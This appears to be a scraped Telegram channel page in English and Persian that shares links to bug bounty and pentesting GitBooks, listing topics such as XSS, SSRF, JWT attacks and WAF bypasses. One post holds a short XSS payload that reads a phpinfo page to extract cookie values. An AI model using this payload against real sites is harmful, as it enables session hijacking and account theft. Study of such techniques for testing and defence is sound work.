Bug Bounty - GitBook
رفتن به کانال در Telegram
Everything 4 bug bounty https://t.me/GiftWay32robot?start=_tgr_HwZ24DI5MWJk
نمایش بیشتر7 436
مشترکین
-124 ساعت
+27 روز
+16630 روز
آرشیو پست ها
7 436
Repost from Bug Bounty - GitBook
𝗪𝗵𝗼𝗔𝗺𝗜 𝗪𝗿𝗶𝘁𝗲𝘂𝗽
•Web Cache Poisoning
•Came looking for SSRF and found XSS
•Phishing Attack using Machine Learning model
•JWT Attacks
•OAuth - Mechanism and Attacks
•Upgrade plan from Free to Paid via Response Manipulation
•XSS IN SOQL Console
•Journey from Automated Discovery to Manual Exploitation
Link 🔗:-
https://ibraradi.gitbook.io/write-up/
@GitBook_s
7 436
Repost from Bug Bounty - GitBook
𝗜𝗻𝗳𝗼𝘀𝗲𝗰 𝗕𝗹𝗼𝗴
•Web Application Findings
•Recon automation, tips and tricks
•Hack The Box Machines
•CTF Challenges
•Red Teaming Tips & Tricks
•Cloud Security
Link 🔗:-
https://eslam3kl.gitbook.io/blog/
@GitBook_s
7 436
Repost from Bug Bounty - GitBook
𝗕𝘂𝗴 𝗛𝘂𝗻𝘁𝗲𝗿 𝗛𝗮𝗻𝗱𝗯𝗼𝗼𝗸
•Getting Started in InfoSec and Bug Bounties
•Presentations
•Checklists / Guides
•Useful Twitter Threads
•List of Vulnerabilities
•API Security
•Mobile Security
•Fuzzing / Wordlists
•BugBounty Short Write-ups
•Burp Suite Tips and Tricks
•HackerOne Reports
•Response Manipulation
•Client Vs Server Side Vulnerabilities
•AWS
•Chaining of Bugs
•Bug Bounty Automation
•Mindmaps
•Oneliner Collections
•Red Teaming
•Blue Teamining
•Recon One Liners
•Containers
•Wordpress
•Fuzzing / FuFF
•OWASP ZAP
•Bug List
•Setting up burp collaborator
•Admin Panel PwN
•Credential Stuffing / Dump / •HaveibeenPwned?
•Tools Required
•Nuclei Template
Link 🔗:-
gowthams.gitbook.io/bughunter-handbook
@GitBook_s
7 436
برای حمایت از کانال پست آخر رو تو گروه ها بفرستید
To support the channel, send the last post to groups.
7 436
x=new XMLHttpRequest();
x.open('GET','//host/phpinfo',0);
x.send();rx=/COOKIE'.*v">(.*?)</;
alert(x.responseText.match(rx)[1]);
#XSS
@GitBook_s
7 436
Guys, how are the gitbooks? Do you like them? If you have any comments about them, please write to me.
7 436
بچه ها گیت بوک ها چطورین، خوب هستن، خوشتون میاد، در این مورد اگه نظری دارید بنویسید برام
دلیل فورواردم اینه که بعضی ها اصلا اول کانال رو نگا نمیکنن
7 436
Repost from Bug Bounty - GitBook
📖
Pentest Book by n3t_hunt3r
XSS Filter Evasion and WAF Bypassing Tactics
Cloud Pentesting
Web App Pentesting
Link 🔗:-
https://n3t-hunt3r.gitbook.io/
@GitBook_s
7 436
Repost from Bug Bounty - GitBook
Pentest Book
Recon
Enumeration
Exploitation
Post Exploitation
Mobile
Others
Link 🔗:-
http://six2dez.gitbook.io
@GitBook_s
7 436
Repost from Bug Bounty - GitBook
Breaking Bits
Vulnerability Discovery
CTF
Firmware Emulator
Exploit Development
Link 🔗:-
https://breaking-bits.gitbook.io/
@GitBook_s
7 436
Repost from Bug Bounty - GitBook
Pentest Everything
🚩Writeups
Everything
Resources
Link 🔗:-
https://viperone.gitbook.io
@GitBook_s
7 436
Repost from Bug Bounty - GitBook
+ Application Security Cheat Sheet
Android Application
CI/CD
Cloud
Container
Framework
Linux
iOS Application
Resources
Web Application
Link 🔗:-
https://0xn3va.gitbook.io/cheat-sheets
@GitBook_s
7 436
Repost from Bug Bounty - GitBook
bounty
Account Takeover Methodology
Application Level DoS
Authentication Bypass
Broken-Link Hijacking
Broken Auth And Session Management
CMS
CORS
CSRF
Finding CVEs
CheckList
Web Page Source Code Review
EXIF Geo Data Not Stripped
File Upload Bypass
Find Origin IP
GraphQL
HTTP Desync Attack
Host-Header Attack
HTML-Injection
IDOR
JWT ATTACK
MFA Bypass
Misconfigurations
OAuth
Open Redirection
Parameter Pollution
Password Reset Functionality
Rate Limit
Recon
SQLi
SSRF
SSTI
Sign Up Functionality
Sensitive Info Leaks
Status Code Bypass
Subdomain Takeover
Tabnabbing
WAF Bypasses
Weak Password Policy
XSS
XXE
Link 🔗:-
https://mjn.gitbook.io
@GitBook_s
7 436
Repost from Bug Bounty - GitBook
OSCP Notes
Port Scanning
Services Enumeration
Web / HTTP
password attacks
Exploitaion
shell
Linux Post Exploitation
windows post exploitation
file transfer
cheatsheets
Link 🔗:-
https://gabb4r.gitbook.io/oscp-notes/
@GitBook_s
7 436
Cross-Site WebSocket Hijacking Exploitation in 2025 - Include Security Research Blog
https://blog.includesecurity.com/2025/04/cross-site-websocket-hijacking-exploitation-in-2025/
اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 
